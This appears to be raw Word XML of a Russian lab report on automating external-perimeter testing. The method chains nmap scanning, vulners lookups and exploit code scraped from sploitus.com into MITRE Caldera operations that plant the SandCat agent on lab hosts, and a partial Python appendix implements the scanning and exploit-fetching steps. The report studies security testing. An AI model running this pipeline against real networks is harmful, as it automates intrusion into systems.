    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="1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47590" cy="4354195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="6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18398" b="27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20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="__RefHeading___Toc1640_3290770187"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Calder</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Перед запуском Калдеры необходимо сформировать файлы с эксплойтами, Ability и Adversary, так как эти файлы подгружаются при запуске и их формирование при запущенной Калдере  не будет иметь эффекта до перезапуска сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Для загрузки эксплойтов использ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">уется запрос на сайт </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sploitus.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, который представляет из себя максимально простой репозиторий эксплойтов. В отличии от exploit-db или vulners.com сразу имеет в ответе указание на язык на котором написан эк</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сплойт, и, разумеется присутствует сам код эксплойта. Далее код сохраняется в соответствующую паку Калдеры с именем по номеру уязвимости и расширением в соответствии с языком. Информация об имени эксплойта добавляется в словарь как «exploit» и сохраняется </w:t>
      </w:r>
      <w:r>
        <w:t>в файл vulns.json.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-31750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5963285" cy="4116705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3342" t="23940" r="25291" b="22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097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Далее формируются файлы Ability в своей папке, с именами формата UUID и со структурой в формате YML. Для формирования файлов используются почти все полученные ранее параметры уязвимости. В качестве обязательного параметра тактики ука</w:t>
      </w:r>
      <w:r>
        <w:t>зываем Initial-access. Далее к записи уязвимости добавляется параметр с UUID Ability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>18415</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>190500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925185" cy="3496945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="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3767" t="28718" r="43398" b="46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097" w:rsidRDefault="00C26DD2"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666115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>81280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4496435" cy="390588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9813" t="16287" r="30903" b="6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097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>После формирования Abilities приступаем к формированию Adversaries.  Так же формируем YML файлы в соответствующих папках и добавляем их UUID в vulns.json. При форми</w:t>
      </w:r>
      <w:r>
        <w:t>ровании так же используется только что созднный Ability UUID и UUID Ablility, которая должна скачать и  запустить агент Калдеры SandCat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="7" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>37465</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>69850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5972810" cy="1074420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="10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3342" t="28879" r="35382" b="6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 w:bidi="ar-SA"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posOffset>46990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1313815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5934710" cy="2176780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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9753" t="37188" r="24490" b="38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097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Полность сформированная запись в vulns.json выглядит следующим образом для каждой найденной:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"ip": "192.168.56.6</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"port": "8080", </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"vulnum": "PACKETSTORM:176334",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"URL": "https://vulners.com/packetstorm/PACKETSTORM:176334", </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"exploit": "PACKETSTORM:176334.sh", </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"ability": "286ab5e0-b99f-4013-819c-dd00febc7c07", </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"adversary": "83d95abf-6955-4f97-af49-a8f61fceb70e"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">На этом этапе подготовительные работы завершены далее происходит работа полученных эксплойтов и компонентов операций в Калдере, поэтому запускаем сервер Калдеры и ждем полторы минуты пока он загрузится. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"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posOffset>-57785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-84455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6020435" cy="3093085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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2859" t="29714" r="15029" b="20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097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Когда сервер загружен производится установка </w:t>
      </w:r>
      <w:r>
        <w:t>и запуск агента Калдеры SandCat. Через него будет осуществляться выполнение наших Ability в рамках Операций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2"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8" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>46990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>14605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5782310" cy="9830435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="13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6385" t="13347" r="36825" b="1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983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097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>После запуска агента можно приступать к выполнению Operation, для этого используется API Калдеры, а именно запрос на создание Opertaion и запрос</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на изменение статуса операции.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="__RefHeading___Toc1642_3290770187"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t>Результаты работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>В качестве результата выполнения скрипта можно ознакомиться со страницей операций локального вэб-приложения Калдеры, по умолчанию запускаемом на порт 8888.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr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posOffset>-10160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-32385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5968365" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="14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2014" t="24444" r="31063" b="30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6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0097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Так же в случае успешного получения первонача</w:t>
      </w:r>
      <w:r>
        <w:t>льного доступа Калдера установит на целевой хост свой агент SandCat и он будет виден на странице с агентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"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posOffset>8890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-15240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988050" cy="2019935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="15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2817" t="25333" r="20640" b="29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20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="__RefHeading___Toc1644_3290770187"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>В ходе работы выполнена реализация предполагаемых методов автоматического анализа внешнего периметра условной организации  с целью обна</w:t>
      </w:r>
      <w:r>
        <w:t>ружения и эксплуатации выявленных уязвимостей. Предложенный алгоритм позволяет реализовать большую часть этапов поставленной задачи. Реализован быстрый и эффективный поиск уязвимых хостов, портов и служб в сканируемой подсети. С помощью дополнительных скри</w:t>
      </w:r>
      <w:r>
        <w:t>птов определяются возможные уязвимости, из них определяются наиболее опасные и легко эксплуатируемые.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>На следующем этапе производится загрузка из общедоступных источников эксплойтов. Этот этап получилось автоматизировать лишь частично, так как большинство</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из эксплойтов имеют собственный синтаксис параметров, в том числе и зашитые в коде переменные, требующие определения. Полученные эксплойты всё же передаются в Калдеру и прописываются в Абилити наиболее распространенным образом и становятся частью Адверсар</w:t>
      </w:r>
      <w:r>
        <w:t>и и Операций.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>К сожалению такие операции малорезультативны и не дают  удовлетворительной оценки состояния внешнего периметра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Таким образом удалось лишь частично автоматизировать процесс сканирования. Для более высокой степени автоматизации необходим парс</w:t>
      </w:r>
      <w:r>
        <w:t>инг скриптов на предмет наличия и синтаксиса параметров и формирование собственной базы эксплойтов со стандартизированными параметрами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="__RefHeading___Toc1041_3518165554"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Список использованных ресурсов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/book/man.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>https://securitytrails.com/blog/nmap-v</w:t>
      </w:r>
      <w:r>
        <w:t>ulnerability-scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://caldera.readthedocs.io/en/latest/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://xakep.ru/2023/02/16/caldera/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/mitre/caldera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@mitrecaldera</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://vulners.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/vulhub/vulhub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable3-ub1404upgraded/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="__RefHeading___Toc1646_3290770187"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="__RefHeading___Toc1043_3518165554"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:t>Приложение № 1. ScanDlCalOp</w:t>
      </w:r>
      <w:r>
        <w:t>.py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import sys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import subprocess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import ipaddress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import re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import json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import requests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from bs4 import BeautifulSoup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import uuid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import os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import time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find_own_ip(subnet):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"""Find own IP within the given subnet."""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own_ips = []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ip_process =</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> subprocess.Popen(["ifconfig", "-a"], stdout=subprocess.PIPE)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ip_output = ip_process.communicate()[0].decode("utf-8")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ip_pattern = r"inet (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"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matches = re.findall(ip_pattern, ip_output)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network = ipaddress.ip_n</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etwork(subnet)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for ip in matches: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if ipaddress.ip_address(ip) in network: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own_ips.append(ip)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return own_ips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scan_subnet(subnet):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"""Run Nmap ping scan on the specified subnet."""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command = ['nmap', '-sP', subnet]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process =</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)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output, _ = process.communicate()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return output.decode('utf-8')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parse_ips(nmap_output):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"""Parse Nmap output and collect IPs."""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ip_pattern = r'(\d{1,3}\.\d{1,3}\.\</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d{1,3}\.\d{1,3})'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ips = re.findall(ip_pattern, nmap_output)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return ips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scan_ports(ip):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"""Scan open ports for the given IP."""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command = ['nmap', '-p-', '-sT', ip]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process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subpr</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ocess.PIPE)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output, _ = process.communicate()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return output.decode('utf-8')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lastRenderedPageBreak/>
        <w:t>def parse_open_ports(nmap_output, ip):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"""Parse Nmap output and collect open ports."""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port_pattern = r'(\d+)/tcp\s+open'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matches = re.findall(port_pattern, nmap_ou</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tput)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return [(ip, port) for port in matches]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scan_vulnerabilities(ip, port):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"""Scan vulnerabilities for the given IP and port."""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command = ['nmap', ip, '-p' + port, '-sV', '--script', 'nmap-vulners/', '-oN', 'out1.txt']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  <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)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parse_vulnerabilities(filename, ip, port):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"""Parse vulnerabilities from the output file."""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with open(filename, 'r') as f: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for line in f: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if '*EXPLOIT*' </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in line: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#print(line)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parts = line.split('\t')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#print(parts)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cvss = float(parts[2])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#print(cvss)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if cvss &gt; 7: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  ip = ip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  port = port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  vulnum = parts[1]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  <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          url = parts[3]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  vulnerabilities.append({"ip": ip, "port": port, "vulnum": vulnum, "URL": url})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return vulnerabilities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get_exploit_code(url):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Send HTTP GET request to the provided URL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response = requests.get(url)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if </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>response.status_code == 200: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# Parse the HTML content using BeautifulSoup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soup = BeautifulSoup(response.content, 'html.parser')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# Find the &lt;pre&gt; tag with class 'centered code'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exploit_pre = soup.find('pre', class_='centered code')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</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     if exploit_pre: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# Get the data-lang attribute to determine the language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language = exploit_pre.get('data-lang')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# Find the &lt;code&gt; tag inside &lt;pre&gt;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exploit_code = exploit_pre.find('code', class_='code-block')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if </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit_code: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return exploit_code.text.strip(), language.lower()  # Convert language to lowercase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else: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print("Exploit code not found in the response.")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return None, None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else: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print("Exploit code not </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
